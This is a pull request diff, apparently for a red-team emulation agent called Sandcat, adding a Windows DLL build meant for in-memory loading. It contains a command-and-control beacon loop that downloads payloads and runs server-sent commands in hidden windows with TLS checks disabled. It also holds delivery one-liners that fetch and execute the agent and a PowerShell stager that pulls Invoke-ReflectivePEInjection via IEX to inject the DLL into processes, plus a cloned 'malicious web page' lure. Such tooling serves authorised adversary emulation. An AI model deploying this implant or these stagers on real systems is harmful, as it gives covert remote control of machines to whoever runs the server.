### PR TITLE
virts-434: added dll compiled sandcat for in-memory only

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -12,3 +12,5 @@
 .logs/*
 !.logs/.gitkeep
 .idea
+shared.h
+sandcat.h

--- a/app/sand_svc.py
+++ b/app/sand_svc.py
@@ -9,26 +9,25 @@ class SandService:
     def __init__(self, file_svc):
         self.file_svc = file_svc
 
-    async def dynamically_compile(self, headers):
+    async def dynamically_compile_executable(self, headers):
         name, platform = headers.get('file'), headers.get('platform')
         if which('go') is not None:
-            if name == 'shared.go':
-                if platform == 'windows' and which('X86_64-w64-mingw32-gcc'):
-                    await self._compile_new_agent(platform=platform,
-                                                  headers=headers,
-                                                  compile_target_name=name.split('.')[0] + '_' + platform + '.go',
-                                                  output_name=name,
-                                                  extension='-lib',
-                                                  buildmode='--buildmode=c-shared',
-                                                  extldflags='-extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"',
-                                                  cflags='GOARCH=amd64 CGO_ENABLED=1 CC=X86_64-w64-mingw32-gcc')
-            else:
-                await self._compile_new_agent(platform=platform,
-                                              headers=headers,
-                                              compile_target_name=name,
-                                              output_name=name)
-            if name == 'shared.go':
-                return '%s-%s-lib' % (name, platform)
+            await self._compile_new_agent(platform=platform,
+                                          headers=headers,
+                                          compile_target_name=name,
+                                          output_name=name)
+        return '%s-%s' % (name, platform)
+
+    async def dynamically_compile_library(self, headers):
+        name, platform = headers.get('file'), headers.get('platform')
+        if which('X86_64-w64-mingw32-gcc') is not None and platform == 'windows':
+            await self._compile_new_agent(platform=platform,
+                                          headers=headers,
+                                          compile_target_name=name.split('.')[0] + '_' + platform + '.go',
+                                          output_name=name,
+                                          buildmode='--buildmode=c-shared',
+                                          extldflags='-extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"',
+                                          cflags='GOARCH=amd64 CGO_ENABLED=1 CC=X86_64-w64-mingw32-gcc')
         return '%s-%s' % (name, platform)
 
     """ PRIVATE """
@@ -37,14 +36,14 @@ class SandService:
     def _generate_key(size=30):
         return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))
 
-    async def _compile_new_agent(self, platform, headers, compile_target_name, output_name, buildmode='', extension='',
-                                 extldflags='', cflags=''):
+    async def _compile_new_agent(self, platform, headers, compile_target_name, output_name, buildmode='', extldflags='',
+                                 cflags=''):
         plugin, file_path = await self.file_svc.find_file_path(compile_target_name)
         ldflags = ['-s', '-w', '-X main.key=%s' % (self._generate_key(),)]
         for param in ('defaultServer', 'defaultGroup', 'defaultSleep'):
             if param in headers:
                 ldflags.append('-X main.%s=%s' % (param, headers[param]))
-        output = 'plugins/%s/payloads/%s-%s%s' % (plugin, output_name, platform, extension)
+        output = 'plugins/%s/payloads/%s-%s' % (plugin, output_name, platform)
         ldflags.append(extldflags)
         self.file_svc.log.debug('Dynamically compiling %s' % compile_target_name)
         await self.file_svc.compile_go(platform, output, file_path, buildmode=buildmode,

--- a/app/sand_svc.py
+++ b/app/sand_svc.py
@@ -12,16 +12,23 @@ class SandService:
     async def dynamically_compile(self, headers):
         name, platform = headers.get('file'), headers.get('platform')
         if which('go') is not None:
-            plugin, file_path = await self.file_svc.find_file_path(name)
-
-            ldflags = ['-s', '-w', '-X main.key=%s' % (self._generate_key(),)]
-            for param in ('defaultServer', 'defaultGroup', 'defaultSleep'):
-                if param in headers:
-                    ldflags.append('-X main.%s=%s' % (param, headers[param]))
-
-            output = 'plugins/%s/payloads/%s-%s' % (plugin, name, platform)
-            self.file_svc.log.debug('Dynamically compiling %s' % name)
-            await self.file_svc.compile_go(platform, output, file_path, ldflags=' '.join(ldflags))
+            if name == 'shared.go':
+                if platform == 'windows' and which('X86_64-w64-mingw32-gcc'):
+                    await self._compile_new_agent(platform=platform,
+                                                  headers=headers,
+                                                  compile_target_name=name.split('.')[0] + '_' + platform + '.go',
+                                                  output_name=name,
+                                                  extension='-lib',
+                                                  buildmode='--buildmode=c-shared',
+                                                  extldflags='-extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"',
+                                                  cflags='GOARCH=amd64 CGO_ENABLED=1 CC=X86_64-w64-mingw32-gcc')
+            else:
+                await self._compile_new_agent(platform=platform,
+                                              headers=headers,
+                                              compile_target_name=name,
+                                              output_name=name)
+            if name == 'shared.go':
+                return '%s-%s-lib' % (name, platform)
         return '%s-%s' % (name, platform)
 
     """ PRIVATE """
@@ -29,3 +36,16 @@ class SandService:
     @staticmethod
     def _generate_key(size=30):
         return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))
+
+    async def _compile_new_agent(self, platform, headers, compile_target_name, output_name, buildmode='', extension='',
+                                 extldflags='', cflags=''):
+        plugin, file_path = await self.file_svc.find_file_path(compile_target_name)
+        ldflags = ['-s', '-w', '-X main.key=%s' % (self._generate_key(),)]
+        for param in ('defaultServer', 'defaultGroup', 'defaultSleep'):
+            if param in headers:
+                ldflags.append('-X main.%s=%s' % (param, headers[param]))
+        output = 'plugins/%s/payloads/%s-%s%s' % (plugin, output_name, platform, extension)
+        ldflags.append(extldflags)
+        self.file_svc.log.debug('Dynamically compiling %s' % compile_target_name)
+        await self.file_svc.compile_go(platform, output, file_path, buildmode=buildmode,
+                                       ldflags=' '.join(ldflags), cflags=cflags)

--- a/gocat/core/core.go
+++ b/gocat/core/core.go
@@ -1,0 +1,96 @@
+package core
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net/http"
+	"os"
+	"os/user"
+	"reflect"
+	"runtime"
+	"strconv"
+
+	"../contact"
+	"../execute"
+	"../output"
+	"../privdetect"
+	"../util"
+)
+
+func runAgent(coms contact.Contact, profile map[string]interface{}) {
+	for {
+		beacon := coms.GetInstructions(profile)
+		if beacon["sleep"] != nil {
+			profile["sleep"] = beacon["sleep"]
+		}
+		if beacon["instructions"] != nil && len(beacon["instructions"].([]interface{})) > 0 {
+			cmds := reflect.ValueOf(beacon["instructions"])
+			for i := 0; i < cmds.Len(); i++ {
+				cmd := cmds.Index(i).Elem().String()
+				command := util.Unpack([]byte(cmd))
+				output.VerbosePrint(fmt.Sprintf("[*] Running instruction %.0f\n", command["id"]))
+				payloads := coms.DropPayloads(command["payload"].(string), profile["server"].(string))
+				go coms.RunInstruction(command, profile, payloads)
+				util.Sleep(command["sleep"].(float64))
+			}
+		} else {
+			util.Sleep(float64(profile["sleep"].(int)))
+		}
+	}
+}
+
+func buildProfile(server string, group string, sleep int, executors []string, privilege string) map[string]interface{} {
+	host, _ := os.Hostname()
+	user, _ := user.Current()
+	paw := fmt.Sprintf("%s$%s", host, user.Username)
+	profile := make(map[string]interface{})
+	profile["paw"] = paw
+	profile["server"] = server
+	profile["group"] = group
+	profile["architecture"] = runtime.GOARCH
+	profile["platform"] = runtime.GOOS
+	profile["location"] = os.Args[0]
+	profile["sleep"] = sleep
+	profile["pid"] = strconv.Itoa(os.Getpid())
+	profile["ppid"] = strconv.Itoa(os.Getppid())
+	profile["executors"] = execute.DetermineExecutor(executors, runtime.GOOS, runtime.GOARCH)
+	profile["privilege"] = privilege
+	return profile
+}
+
+func chooseCommunicationChannel(profile map[string]interface{}) contact.Contact {
+	coms, _ := contact.CommunicationChannels["API"]
+	if coms.Ping(profile["server"].(string)) {
+		//go util.StartProxy(profile["server"].(string))
+		return coms
+	}
+	proxy := util.FindProxy()
+	if len(proxy) == 0 {
+		return nil
+	}
+	profile["server"] = proxy
+	return coms
+}
+
+// Core Run the core agent loop
+func Core(server string, group string, sleep string, executors []string, verbose bool) {
+	http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
+	sleepInt, _ := strconv.Atoi(sleep)
+	privilege := privdetect.Privlevel()
+
+	output.SetVerbose(verbose)
+	output.VerbosePrint("Started sandcat in verbose mode.")
+	output.VerbosePrint(fmt.Sprintf("server=%s", server))
+	output.VerbosePrint(fmt.Sprintf("group=%s", group))
+	output.VerbosePrint(fmt.Sprintf("sleep=%d", sleepInt))
+	output.VerbosePrint(fmt.Sprintf("privilege=%s", privilege))
+
+	profile := buildProfile(server, group, sleepInt, executors, privilege)
+	for {
+		coms := chooseCommunicationChannel(profile)
+		if coms != nil {
+			for { runAgent(coms, profile) }
+		}
+		util.Sleep(300)
+	}
+}

--- a/gocat/execute/execute.go
+++ b/gocat/execute/execute.go
@@ -7,6 +7,7 @@ import (
 	"runtime"
 	"strconv"
 	"strings"
+	"syscall"
 	"time"
 
 	"../shellcode"
@@ -134,6 +135,7 @@ func runShellExecutor(executor string, platform string, command string) ([]byte,
 	status := SUCCESS_STATUS
 	var stdoutBuf, stderrBuf bytes.Buffer
 	cmd := buildCommandStatement(executor, platform, command)
+	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
 	cmd.Stdout = &stdoutBuf
 	cmd.Stderr = &stderrBuf
 	err := cmd.Start()

--- a/gocat/sandcat.go
+++ b/gocat/sandcat.go
@@ -1,21 +1,10 @@
 package main
 
 import (
-	"crypto/tls"
 	"flag"
-	"fmt"
-	"net/http"
-	"os"
-	"os/user"
-	"reflect"
-	"runtime"
-	"strconv"
 
-	"./contact"
+	"./core"
 	"./execute"
-	"./util"
-	"./output"
-	"./privdetect"
 )
 
 /*
@@ -29,64 +18,8 @@ var (
     defaultSleep = "60"
 )
 
-func runAgent(coms contact.Contact, profile map[string]interface{}) {
-	for {
-		beacon := coms.GetInstructions(profile)
-		if beacon["sleep"] != nil {
-			profile["sleep"] = beacon["sleep"]
-		}
-		if beacon["instructions"] != nil && len(beacon["instructions"].([]interface{})) > 0 {
-			cmds := reflect.ValueOf(beacon["instructions"])
-			for i := 0; i < cmds.Len(); i++ {
-				cmd := cmds.Index(i).Elem().String()
-				command := util.Unpack([]byte(cmd))
-				fmt.Printf("[*] Running instruction %s\n", command["id"])
-				payloads := coms.DropPayloads(command["payload"].(string), profile["server"].(string))
-				go coms.RunInstruction(command, profile, payloads)
-				util.Sleep(command["sleep"].(float64))
-			}
-		} else {
-			util.Sleep(float64(profile["sleep"].(int)))
-		}
-	}
-}
-
-func buildProfile(server string, group string, sleep int, executors []string, privilege string) map[string]interface{} {
-	host, _ := os.Hostname()
-	user, _ := user.Current()
-	paw := fmt.Sprintf("%s$%s", host, user.Username)
-	profile := make(map[string]interface{})
-	profile["paw"] = paw
-	profile["server"] = server
-	profile["group"] = group
-	profile["architecture"] = runtime.GOARCH
-	profile["platform"] = runtime.GOOS
-	profile["location"] = os.Args[0]
-	profile["sleep"] = sleep
-	profile["pid"] = strconv.Itoa(os.Getpid())
-	profile["ppid"] = strconv.Itoa(os.Getppid())
-	profile["executors"] = execute.DetermineExecutor(executors, runtime.GOOS, runtime.GOARCH)
-	profile["privilege"] = privilege
-	return profile
-}
-
-func chooseCommunicationChannel(profile map[string]interface{}) contact.Contact {
-	coms, _ := contact.CommunicationChannels["API"]
-	if coms.Ping(profile["server"].(string)) {
-		//go util.StartProxy(profile["server"].(string))
-		return coms
-	}
-	proxy := util.FindProxy()
-	if len(proxy) == 0 {
-		return nil
-	} 
-	profile["server"] = proxy
-	return coms
-}
-
 func main() {
 	var executors execute.ExecutorFlags
-	http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
 	server := flag.String("server", defaultServer, "The FQDN of the server")
 	group := flag.String("group", defaultGroup, "Attach a group to this agent")
 	sleep := flag.String("sleep", defaultSleep, "Initial sleep value for sandcat (integer in seconds)")
@@ -94,22 +27,5 @@ func main() {
 
 	flag.Var(&executors, "executors", "Comma separated list of executors (first listed is primary)")
 	flag.Parse()
-	sleepInt, _ := strconv.Atoi(*sleep)
-	privilege := privdetect.Privlevel()
-
-    output.SetVerbose(*verbose)
-    output.VerbosePrint("Started sandcat in verbose mode.")
-    output.VerbosePrint(fmt.Sprintf("server=%s", *server))
-    output.VerbosePrint(fmt.Sprintf("group=%s", *group))
-    output.VerbosePrint(fmt.Sprintf("sleep=%d", sleepInt))
-    output.VerbosePrint(fmt.Sprintf("privilege=%s", privilege))
-
-	profile := buildProfile(*server, *group, sleepInt, executors, privilege)
-	for {
-		coms := chooseCommunicationChannel(profile)
-		if coms != nil {
-			for { runAgent(coms, profile) }
-		}
-		util.Sleep(300)
-	}
+	core.Core(*server, *group, *sleep, executors, *verbose)
 }

--- a/gocat/shared/shared_windows.go
+++ b/gocat/shared/shared_windows.go
@@ -1,6 +1,9 @@
 package main
 
 import "C"
+import (
+	"../core"
+)
 
 var (
 	key = "JWHQZM9Z4HQOYICDHW4OCJAXPPNHBA"
@@ -14,4 +17,4 @@ func VoidFunc() {
 	core.Core(defaultServer, defaultGroup, defaultSleep, []string{"psh","cmd"}, false)
 }
 
-func main() {} 
+func main() {}

--- a/gocat/shared/shared_windows.go
+++ b/gocat/shared/shared_windows.go
@@ -1,0 +1,17 @@
+package main
+
+import "C"
+
+var (
+	key = "JWHQZM9Z4HQOYICDHW4OCJAXPPNHBA"
+	defaultServer = "http://localhost:8888"
+	defaultGroup = "my_group"
+	defaultSleep = "60"
+)
+
+//export VoidFunc
+func VoidFunc() {
+	core.Core(defaultServer, defaultGroup, defaultSleep, []string{"psh","cmd"}, false)
+}
+
+func main() {} 

--- a/hook.py
+++ b/hook.py
@@ -10,6 +10,7 @@ address = '/plugin/sandcat/gui'
 async def initialize(app, services):
     file_svc = services.get('file_svc')
     await file_svc.add_special_payload('sandcat.go', SandService(file_svc).dynamically_compile)
+    await file_svc.add_special_payload('shared.go', SandService(file_svc).dynamically_compile)
 
     cat_api = SandApi(services=services)
     cat_gui_api = SandGuiApi(services=services)

--- a/hook.py
+++ b/hook.py
@@ -9,8 +9,8 @@ address = '/plugin/sandcat/gui'
 
 async def initialize(app, services):
     file_svc = services.get('file_svc')
-    await file_svc.add_special_payload('sandcat.go', SandService(file_svc).dynamically_compile)
-    await file_svc.add_special_payload('shared.go', SandService(file_svc).dynamically_compile)
+    await file_svc.add_special_payload('sandcat.go', SandService(file_svc).dynamically_compile_executable)
+    await file_svc.add_special_payload('shared.go', SandService(file_svc).dynamically_compile_library)
 
     cat_api = SandApi(services=services)
     cat_gui_api = SandGuiApi(services=services)

--- a/templates/sandcat.html
+++ b/templates/sandcat.html
@@ -121,7 +121,7 @@
             } else if (identity === 'darwin') {
                 x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:darwin\' '+loc+'/file/download > /tmp/sandcat-darwin && chmod +x /tmp/sandcat-darwin && /tmp/sandcat-darwin -server '+loc+' -group my_group -v;');
             } else if(identity === 'windows-dll-mem') {
- 				x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("defaultServer","'+loc+'"); $wc.Headers.add("defaultSleep","60"); $wc.Headers.add("defaultGroup","my_group"); $PEBytes = $wc.DownloadData($url);');
+				x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("defaultServer","'+loc+'"); $wc.Headers.add("defaultSleep","60"); $wc.Headers.add("defaultGroup","my_group"); $PEBytes = $wc.DownloadData($url); $wc1 = New-Object System.net.webclient; $wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1"); IEX ($wc1.DownloadString($url)); Invoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId');
  			} else if(identity === 'windows-dll-disk') {
  				x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("defaultServer","'+loc+'"); $output="C:\\Users\\Public\\sandcat.dll"; $wc.DownloadFile($url,$output); rundll32.exe C:\\Users\\Public\\sandcat.dll,VoidFunc');
  			}

--- a/templates/sandcat.html
+++ b/templates/sandcat.html
@@ -45,39 +45,61 @@
                 <!-- Access -->
 
                 <div class="section-profile">
-                    <div id="access" class="row">
-                        <div class="column section-border" style="flex:50%">
-                            <h4>Option #1</h4>
-                            <p class="paragraph">
-                                Copy and paste one of the delivery commands into a terminal window.
-                            </p>
-                            <center>
-                            <div>
-                                <label><input type="radio" name="delivery" onclick="show('windows-psh')" />PowerShell</label>
-                                <label><input type="radio" name="delivery" onclick="show('windows-cmd')" />CMD</label>
-                                <label><input type="radio" name="delivery" onclick="show('linux')" />Linux</label>
-                                <label><input type="radio" name="delivery" onclick="show('darwin')" />MacOS</label>
-                            </div>
-                            </center>
-                            <div class="delivery">
-                                <code id="delivery-command"></code>
-                            </div>
-                        </div>
-                        <div class="column malicious-link" style="flex:50%">
-                            <h4>Option #2</h4>
-                            <p class="paragraph">
-                                Have each targeted machine navigate to our malicious web page. Then start the downloaded
-                                54ndc47 agent. Use our sample malicious web page or overwrite it using the website
-                                cloning button below.
-                            </p>
-                            <a href="/plugin/sandcat/malicious" target="_blank">
-                                <img src="/sandcat/img/arrow.png"/>
-                            </a>
-                            <br>
-                            <input id="cloneNew" placeholder="Enter a url"/>
-                            <button type="button" class="button-success" onclick="cloneWebsite()">Clone</button>
-                        </div>
-                    </div>
+                      <div id="access" class="row" style="flex-direction: column;">
+                         <div class="" style="display: flex;border-bottom: var(--font-color) 1px solid;">
+                             <div class="column section-border" style="flex:50%">
+                                 <h4>Option #1</h4>
+                                 <p class="paragraph">
+                                     Copy and paste one of the delivery commands into a terminal window.
+                                 </p>
+                                 <center>
+                                 <div>
+                                     <label><input type="radio" name="delivery" onclick="show('windows-psh', '#delivery-command')" />PowerShell</label>
+                                     <label><input type="radio" name="delivery" onclick="show('windows-cmd', '#delivery-command')" />CMD</label>
+                                     <label><input type="radio" name="delivery" onclick="show('linux', '#delivery-command')" />Linux</label>
+                                     <label><input type="radio" name="delivery" onclick="show('darwin', '#delivery-command')" />MacOS</label>
+                                 </div>
+                                 </center>
+                                 <div class="delivery">
+                                     <code id="delivery-command"></code>
+                                 </div>
+                             </div>
+                             <div class="column malicious-link" style="flex:50%">
+                                 <h4>Option #2</h4>
+                                 <p class="paragraph">
+                                     Have each targeted machine navigate to our malicious web page. Then start the downloaded
+                                     54ndc47 agent. Use our sample malicious web page or overwrite it using the website
+                                     cloning button below.
+                                 </p>
+                                 <a href="/plugin/sandcat/malicious" target="_blank">
+                                     <img src="/sandcat/img/arrow.png"/>
+                                 </a>
+                                 <br>
+                                 <input id="cloneNew" placeholder="Enter a url"/>
+                                 <button type="button" class="button-success" onclick="cloneWebsite()">Clone</button>
+                             </div>
+                         </div>
+                          <div class="" style="display: flex;">
+                             <div class="column section-border" style="flex:50%">
+                                 <h4>Option #3</h4>
+                                 <p class="paragraph">
+                                     Download Sandcat as a shared library (DLL, so, dylib); for use with a Reflective DLL injection (or similar) technique or saving to disk.
+                                     <em>VoidFunc()</em> accepts no arguments, <em>Spawn(server, group, sleep, verbose)</em> accepts a server, group, and sleep string, along with a boolean verbose.  Tested with PowerShellMafia's <em>Invoke-ReflectivePEInjection</em>.
+                                     <br><b>REQUIRES MinGW to be installed server-side</b>
+                                 </p>
+                                 <center>
+                                 <div>
+                                     <label><input type="radio" name="delivery" onclick="show('windows-dll-mem', '#delivery-command-lib')" />Windows DLL<br>(Memory)</label>
+                                     <label><input type="radio" name="delivery" onclick="show('windows-dll-disk', '#delivery-command-lib')" />Windows DLL<br>(Disk)</label>
+                                 </div>
+                                 </center>
+                                 <div class="delivery">
+                                     <code id="delivery-command-lib"></code>
+                                 </div>
+                             </div>
+                             <div class="column" style="flex:50%"></div>
+                          </div>
+                      </div>
                 </div>
 
             </div>
@@ -87,8 +109,8 @@
     <script src="/gui/jquery/jquery.js"></script>
     <script src="/gui/js/shared.js"></script>
     <script>
-        function show(identity) {
-            let x = $('#delivery-command');
+        function show(identity, elem) {
+            let x = $(elem);
             let loc = location.protocol+'//'+location.hostname+(location.port ? ':'+location.port: '');
             if(identity === 'windows-psh') {
                 x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\\Users\\Public\\sandcat.exe";$wc.DownloadFile($url,$output); C:\\Users\\Public\\sandcat.exe -server ' + loc + ' -group my_group -v;');
@@ -98,7 +120,11 @@
                 x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:linux\' '+loc+'/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux -server '+loc+' -group my_group -v;');
             } else if (identity === 'darwin') {
                 x.text('curl -sk -X POST -H \'file:sandcat.go\' -H \'platform:darwin\' '+loc+'/file/download > /tmp/sandcat-darwin && chmod +x /tmp/sandcat-darwin && /tmp/sandcat-darwin -server '+loc+' -group my_group -v;');
-            }
+            } else if(identity === 'windows-dll-mem') {
+ 				x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("defaultServer","'+loc+'"); $wc.Headers.add("defaultSleep","60"); $wc.Headers.add("defaultGroup","my_group"); $PEBytes = $wc.DownloadData($url);');
+ 			} else if(identity === 'windows-dll-disk') {
+ 				x.text('$url="' + loc + '/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("defaultServer","'+loc+'"); $output="C:\\Users\\Public\\sandcat.dll"; $wc.DownloadFile($url,$output); rundll32.exe C:\\Users\\Public\\sandcat.dll,VoidFunc');
+ 			}
         }
         function actionDownload(phrase){
             $.getScript('/sandcat/js/malicious.js');


### PR DESCRIPTION
Okay, so there are a lot of "moving parts" and trial methods that I had to go through. I'll hit on the major points:

- Addition of a new build dependency (MinGw32) to enable Cross-compiling C libraries
- By selecting a file target of "shared.go" we select a target shared_<platform>.go file to compile (only Windows at this point)
- Compiling for windows uses specific a specific build mode, specific CFLAGS, and specific external linker flags
- `compile_go` has been extended to support passing of CFLAGS, External LDFLAGS, and Buildmode
- You are able to download the Windows DLL to disk OR straight into memory from Powershell stager.  In memory is stored in `$PEbytes` and can be immediately passed to `Invoke-ReflectivePEInjection` to target remote processes and remote computers